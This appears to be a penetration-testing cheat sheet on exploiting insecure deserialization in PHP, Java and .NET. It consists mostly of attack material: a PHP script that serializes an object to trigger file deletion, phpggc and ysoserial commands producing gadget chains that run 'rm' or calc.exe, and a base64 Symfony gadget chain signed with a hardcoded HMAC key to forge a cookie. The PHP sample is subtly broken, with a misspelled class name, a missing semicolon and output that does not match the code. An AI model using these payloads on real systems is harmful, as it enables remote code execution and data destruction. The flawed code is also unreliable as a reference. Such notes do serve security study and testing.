Insecure Deserialization
Manual and gadget chain manipulation
PHP
Manual serialization
Manual serialization with class internal members override (access to an app source code) in order to achieve specific functionality.
<?php
// app class definition deletes a template file in the class destructor()
// initiate the object through cookie "session"
class CustomTemplate {
// make sure the access attribute is "public"
public $template_file_path;
}
$c = new CustomTeplate();
$c->template_file_path="/path/file-to-delete.txt"
// final serialized PHP object
echo serialize($c);
/* output
O:14:"CustomTemplate":1:{s:14:"lock_file_path";s:24:"/path/file-to-delete.txt";}
*/
?>
PHPGCC
automatic gadget chain when no source code review is possible
git clone https://github.com/ambionics/phpggc.git
phpggc symfony/rce4 exec 'rm /path/file-to-delete.txt' | base64 -w 0
SHA1-HMAC - PHP signed gadget chain
<?php
$phpgcc_object = "Tzo0NzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXIiOjI6e3M6NTc6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFRhZ0F3YXJlQWRhcHRlcgBkZWZlcnJlZCI7YToxOntpOjA7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQ2FjaGVJdGVtIjoyOntzOjExOiIAKgBwb29sSGFzaCI7aToxO3M6MTI6IgAqAGlubmVySXRlbSI7czoyNjoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO319czo1MzoiAFN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcVGFnQXdhcmVBZGFwdGVyAHBvb2wiO086NDQ6IlN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcUHJveHlBZGFwdGVyIjoyOntzOjU0OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAcG9vbEhhc2giO2k6MTtzOjU4OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAc2V0SW5uZXJJdGVtIjtzOjQ6ImV4ZWMiO319Cg==";
$secretKey = "mx557o5crourg7j9hrmve29bdb60dfsn";
$cookie = urlencode('{"token":"' . $phpgcc_object . '","sig_hmac_sha1":"' . hash_hmac('sha1', $phpgcc_object, $secretKey) . '"}');
echo $cookie;
?>
Java
// there is no jar!
git clone https://github.com/frohoff/ysoserial.git
// jar download
wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
java -jar ysoserial.jar CommonsCollections4 calc.exe
java -jar ./ysoserial-master-SNAPSHOT.jar CommonsCollections4 'rm /path/file-to-delete.txt\'|base64 -w0
.NET
git clone https://github.com/pwntester/ysoserial.net.git
Last updated
Was this helpful?